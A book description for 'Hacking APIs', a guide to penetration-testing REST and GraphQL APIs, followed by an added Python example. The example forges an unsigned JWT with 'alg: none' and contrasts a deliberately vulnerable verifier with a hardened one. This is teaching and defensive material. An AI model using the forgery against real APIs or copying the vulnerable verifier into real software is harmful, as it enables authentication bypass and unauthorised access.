Hacking APIs: Breaking Web Application Programming Interfaces (Final Release)

Hacking APIs is a crash course in web API security testing that will prepare you to penetration-test APIs, reap high rewards on bug bounty programs, and make your own APIs more secure.
You’ll learn how REST and GraphQL APIs work in the wild and set up a streamlined API testing lab with Burp Suite and Postman. Then you’ll master tools useful for reconnaissance, endpoint analysis, and fuzzing, such as Kiterunner and OWASP Amass. Next, you’ll learn to perform common attacks, like those targeting an API’s authentication mechanisms and the injection vulnerabilities commonly found in web applications. You’ll also learn techniques for bypassing protections against these attacks.
In the book’s nine guided labs, which target intentionally vulnerable APIs, you’ll practice:
• Enumerating API users and endpoints using fuzzing techniques
• Using Postman to discover an excessive data exposure vulnerability
• Performing a JSON Web Token attack against an API authentication process
• Combining multiple API attack techniques to perform a NoSQL injection
• Attacking a GraphQL API to uncover a broken object level authorization vulnerability
By the end of the book, you’ll be prepared to uncover those high-payout API bugs other hackers aren’t finding and improve the security of applications on the web.
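The JSON Web Token lab listed above, as an added example that is not from the book: a verifier that lets the token's own header choose the algorithm accepts an unsigned `alg: none` token carrying forged claims, while a verifier that pins HS256 server-side rejects it. The secret key, the claims and the function names are constructed for this demonstration and do not come from the book's lab API.

```python
"""Added example (not from the book): forging a JWT with alg:none against a
verifier that trusts the token header, beside the pinned-algorithm fix."""
import base64
import hashlib
import hmac
import json

# Assumption: the API's HMAC signing key (constructed for the demo).
SECRET = b"constructed-demo-secret"


def b64url(data: bytes) -> str:
    """JWT-style base64url without padding."""
    return base64.urlsafe_b64encode(data).rstrip(b"=").decode()


def b64url_decode(s: str) -> bytes:
    """Re-add padding stripped by b64url() before decoding."""
    return base64.urlsafe_b64decode(s + "=" * (-len(s) % 4))


def encode_segment(obj: dict) -> str:
    return b64url(json.dumps(obj, separators=(",", ":")).encode())


def sign_hs256(claims: dict, key: bytes) -> str:
    """Issue a legitimate HS256 token, as the API's login endpoint would."""
    header = {"alg": "HS256", "typ": "JWT"}
    signing_input = f"{encode_segment(header)}.{encode_segment(claims)}"
    sig = hmac.new(key, signing_input.encode(), hashlib.sha256).digest()
    return f"{signing_input}.{b64url(sig)}"


def forge_alg_none(new_claims: dict) -> str:
    """Attacker: set alg to none, substitute claims, send an empty signature."""
    header = {"alg": "none", "typ": "JWT"}
    return f"{encode_segment(header)}.{encode_segment(new_claims)}."


def verify_vulnerable(token: str, key: bytes):
    """Vulnerable verifier: the token header decides how it is validated."""
    h, p, s = token.split(".")
    header = json.loads(b64url_decode(h))
    if header.get("alg") == "none":
        return json.loads(b64url_decode(p))  # accepts unsigned tokens
    if header.get("alg") == "HS256":
        expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
        if hmac.compare_digest(expected, b64url_decode(s)):
            return json.loads(b64url_decode(p))
    return None


def verify_hardened(token: str, key: bytes):
    """Hardened verifier: HS256 is pinned server-side; the header cannot change it."""
    try:
        h, p, s = token.split(".")
    except ValueError:
        return None
    expected = hmac.new(key, f"{h}.{p}".encode(), hashlib.sha256).digest()
    if not hmac.compare_digest(expected, b64url_decode(s)):
        return None  # empty or wrong signature: reject before reading claims
    header = json.loads(b64url_decode(h))
    if header.get("alg") != "HS256":  # defence in depth: header must match pin
        return None
    return json.loads(b64url_decode(p))
```

The point to carry into a real engagement: the attack does not need the key, only a verifier that dispatches on the untrusted `alg` field. Checking that an API rejects an `alg: none` token (and one signed with a wrong key) is a two-request test in Burp Suite or Postman.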
